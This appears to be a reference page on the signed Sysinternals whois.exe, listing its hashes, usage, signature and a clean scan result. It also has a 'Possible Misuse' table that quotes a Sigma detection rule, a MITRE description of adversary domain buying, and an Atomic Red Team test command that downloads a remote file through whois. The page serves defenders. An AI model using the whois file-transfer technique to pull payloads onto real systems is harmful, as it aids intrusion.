whois.exe

  • File Path: C:\SysinternalsSuite\whois.exe
  • Description: Domain information lookup

Hashes

Type Hash
MD5 CC15CEBF5FF64EA1727B4DE5F3210328
SHA1 A33FB1E1E723F06FE3300DFBE731A71C297C38A1
SHA256 EA845B43C323E35DF041B8914A520F1D9643E3689454AB3049C2103458A0142D
SHA384 C3B7BA06A56BDC7978BE3EFF72BEF9F0DDB7E13AC556E371D905BA991DD1EB146FBAF52004828EFCA2EA364973E8BF20
SHA512 A4BA41795A9EF6705CD15E723FA1E36F05257C92C8256FFF74CA6EAE93305C2FBEBA008DBC49A190F07620C58D5AB59659ACB8D01AAEE9EA069B85110CA3B2D0
SSDEEP 6144:/9gygp+LcfoTLO5k634qZvl7nWCAKXpJzCos2amvBn4r:/9ip2cfoTi5R3/Zd7nWfczjZ4r
IMP 0B29BD01E42EB3C976398C7D94126E64
PESHA1 826FD7F5BA20106C4007ECAA1DC90A1D6C993C90
PE256 9595C643C605B028AF9F20136AC4BA30985E1A830B854ADD9573B7C96B1348AD

Runtime Data

Usage (stdout):


Whois v1.21 - Domain information lookup
Copyright (C) 2005-2019 Mark Russinovich
Sysinternals - www.sysinternals.com


Usage: whois [-v] domainname [whois.server]
 -v   Print whois information for referrals
 -nobanner
      Do not display the startup banner and copyright message.

Usage (stderr):

No such host is known.

Loaded Modules:

Path
C:\SysinternalsSuite\whois.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\wow64.dll
C:\Windows\System32\wow64cpu.dll
C:\Windows\System32\wow64win.dll

Signature

  • Status: Signature verified.
  • Serial: 33000001519E8D8F4071A30E41000000000151
  • Thumbprint: 62009AAABDAE749FD47D19150958329BF6FF4B34
  • Issuer: CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: whois.exe
  • Product Name: Sysinternals Whois
  • Company Name: Sysinternals - www.sysinternals.com
  • File Version: 1.21
  • Product Version: 1.21
  • Language: English (United States)
  • Legal Copyright: Copyright (C) 2005-2019 Mark Russinovich
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/71
  • VirusTotal Link: https://www.virustotal.com/gui/file/ea845b43c323e35df041b8914a520f1d9643e3689454ab3049c2103458a0142d/detection/

Possible Misuse

The following table contains possible examples of whois.exe being misused. While whois.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_false_sysinternalsuite.yml - '\whois.exe' DRL 1.0
malware-ioc misp-badiis.json "description": "Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)", © ESET 2014-2018
atomic-red-team index.md - T1596.002 WHOIS CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #14: whois file download [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - T1596.002 WHOIS CONTRIBUTE A TEST MIT License. © 2018 Red Canary
atomic-red-team linux-index.md - Atomic Test #14: whois file download [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team macos-index.md - Atomic Test #14: whois file download [linux, macos] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #14 - whois file download MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #14 - whois file download MIT License. © 2018 Red Canary
atomic-red-team T1105.md Download a remote file using the whois utility MIT License. © 2018 Red Canary
atomic-red-team T1105.md | output_file | Path of file to save output to | Path | /tmp/T1105.whois.out| MIT License. © 2018 Red Canary
atomic-red-team T1105.md timeout –preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} “#{query}” > #{output_file} MIT License. © 2018 Red Canary
atomic-red-team T1105.md ##### Description: The whois and timeout commands must be present MIT License. © 2018 Red Canary
atomic-red-team T1105.md which whois && which timeout MIT License. © 2018 Red Canary
atomic-red-team T1105.md echo “Please install timeout and the whois package” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.